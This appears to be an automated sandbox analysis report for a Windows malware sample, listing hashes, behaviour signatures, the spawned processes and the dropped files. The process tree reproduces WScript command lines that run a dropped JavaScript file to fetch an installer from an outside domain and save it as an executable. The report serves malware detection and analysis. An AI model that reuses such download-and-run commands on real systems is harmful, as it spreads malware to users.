Analysis

  • max time kernel
    118s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    01/06/2024, 20:12

General

  • Target

    8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    8ba333b98a38b67f9d30f42dc614afe7

  • SHA1

    e0a78d2648530a0606b41421b56c2c9cff8c608c

  • SHA256

    29dabe35f9152188abfde68ee58856d47a421c7d7bda87ff68c5bf5f692d00df

  • SHA512

    8a0301bdc4565264d364b33cae53d3d7566d911814062d1dcc6cedf5dd91823cf65bc889c59838f23449df9120d40baf35a71900751a6fab21c98439db46931e

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO30W:/7BSH8zUB+nGESaaRvoB7FJNndnw

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 14 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:3020
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:2804
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      PID:2788
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      PID:1772
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      PID:2892
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 460
      2⤵
      • Program crash
      PID:1360

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          1KB

          MD5

          367be39f0f0bd10ee528276085ebdf48

          SHA1

          bd2d8f3b91e3d0e5dcca4c0734f27ca4b0f257ce

          SHA256

          6568d4a4c638ae3fec4d5bef16d7f5378195466005a7d7de3667b501878e566c

          SHA512

          1e33cbeabbf89c1d5f5320be70459a27b2b4fdbbb4e5bd8fdcd4f4dea5b5b7761e49ca4cc72dd0a33423e4ce15353495eeef01472c7cb005c9d9dd4ea9d4a606

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          724B

          MD5

          8202a1cd02e7d69597995cabbe881a12

          SHA1

          8858d9d934b7aa9330ee73de6c476acf19929ff6

          SHA256

          58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

          SHA512

          97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          410B

          MD5

          e1c83e43bce6f1e2d63dedd5fb5b737a

          SHA1

          c4f7f6ddd762622d230f79a785495e0904d2e9a1

          SHA256

          fb1bb667f8eef8ae1528418dfe84eacad9cf01f4ab3da365c6aedd3e07af8bea

          SHA512

          4b3a6056093a3c2352def199044d8fc1ee85dafd01b07486a83a3be4240d317b8804ebe7471ab8d9aaeedf2d748720255ead65c7ef1cf7b069c268a4838a5b79

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          064e0d148a9c6dc31553d5853fe701ef

          SHA1

          b83ef46a854fe5fea917a340ebb2099b0ad4ac0b

          SHA256

          bee03cb21bd4c4040d379657f7ea8c53a8a66b20113090ff97bb86adf8928ded

          SHA512

          3b6fd108929b7ea78ed19c63ee25bb8fb4f370dac29ff73dfdea4fea4ebd19255b52313b49ac1d1f3d891641bf91eb3eb1ec50103eb472a8a007a9aee9637dc5

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          392B

          MD5

          371e0e8ad5bf71ee0415bc0ef2810f46

          SHA1

          5a7652aba6165d8606e4fa290d4933499efdfc9d

          SHA256

          5e68fdc9ff581251f352de874c3b1ef18d22cc0f38684d368d22ac2e8a0d0a0f

          SHA512

          754705c70d40b44af8feffb04b6b390729010280c92e27877b3e78aed95d16b874b0f514f039fb7e66f82f0251b254ff004261ec367f750068fd88d8488c422c

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          fb3d4c03f0410c33373834b0836fab05

          SHA1

          a31b7e36de6b7794bff6ed26e86f4e2957d94fa2

          SHA256

          e3cf3f79ad0e1cb98e344cdd265c11ee55f5c77864629b5a4243d8f3071c6160

          SHA512

          eccaebcb4fa20fae1f2bf56700eb3e1501945b76c307bf28944518ce7b227d388337fa098ada95c080699f4641cfc6693cbbd42dc2d943a426633b470baa5e2a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1J224M4\domain_profile[1].htm

          Filesize

          6KB

          MD5

          6e2125138c3caf153ea4f9637c965e0f

          SHA1

          1477d0eed82b4dc4c6bdfa516bafb0b0607890de

          SHA256

          2e79dd13e68730ee3ad9928968e347d01367e6e3173d190cedf01869483a5d87

          SHA512

          4771348e79ef76d9e70f003f7b384735fc83b1541858fd9af0a00d516787e6d0a1ce719f6424756d9ce7aabe158aa4edd27e2965031420c234250f3be3aab221

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1J224M4\domain_profile[1].htm

          Filesize

          6KB

          MD5

          f69723107188c758ac327cd3078490f0

          SHA1

          774a1619b4bf70cbeed19552f80fcf66d5a7d25c

          SHA256

          75b1a27866addae0e781f50167f35627e26b7a49e589dea304d8e67ae672c7c1

          SHA512

          7764b9f19fdc41fcf76e80b83dfbb5b83e2dcec64bde8bba1ee69f2471f5d8105d87f11b283c62e4e833922ad789a052c091c94677859f9a95bdf1063cbed9dc

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L47MRCGC\domain_profile[1].htm

          Filesize

          40KB

          MD5

          85ac5b0c1d4e9718f7041eefbd088ca6

          SHA1

          45d9405296a830719795c41b0c28381d69d4f00e

          SHA256

          23fe0d3946aae3cba28758c331b913d7de8441aa8e3b1459a1f3e55975c51570

          SHA512

          1f2e03ccabcda8d07d26df0bbb6cef9b65d6a8eb00ade2122d76bef5a0f815806601f8d191fd5a500b0eaac2eaf12510660106a94cdfbfdb8072b9b2010a3a96

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L47MRCGC\domain_profile[1].htm

          Filesize

          6KB

          MD5

          ba02e5bc1cc86e37fc860aa61f722e56

          SHA1

          03809938564fb66fd1e74bfb030d645827ddd124

          SHA256

          dc078c167cdd340aa294b8828e477d805f49511890d3cd1d94711108be0cfc81

          SHA512

          c5df39dfa63ca24fe7571c01101a69cf1716f8fff60406f2bf55b8da2bbcac32978bc21c75088a08f4803b9fe2e0fbc7b9b87b5004ffb3f5da7210e98e53b0b0

        • C:\Users\Admin\AppData\Local\Temp\Tar369B.tmp

          Filesize

          181KB

          MD5

          4ea6026cf93ec6338144661bf1202cd1

          SHA1

          a1dec9044f750ad887935a01430bf49322fbdcb7

          SHA256

          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

          SHA512

          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        • C:\Users\Admin\AppData\Local\Temp\fuf722.js

          Filesize

          3KB

          MD5

          3813cab188d1de6f92f8b82c2059991b

          SHA1

          4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

          SHA256

          a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

          SHA512

          83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\X531EG1G.txt

          Filesize

          171B

          MD5

          093d20442d381bf025090c64946fb944

          SHA1

          399789198c7745cfd5eafff4c2d6f9e54b587ff1

          SHA256

          1160fbf4429c0ae348f5d99211f113122cd8028fe4ba0d7146f4cb3b93c7c412

          SHA512

          5b2397436e554f2a93b807edb75690e0360ee7a56c672f2dfca632902067998d6a36f8711b2071b5c27d14fc6fd2e18e45c80ae1a25c9832c1b70ee24b52f23f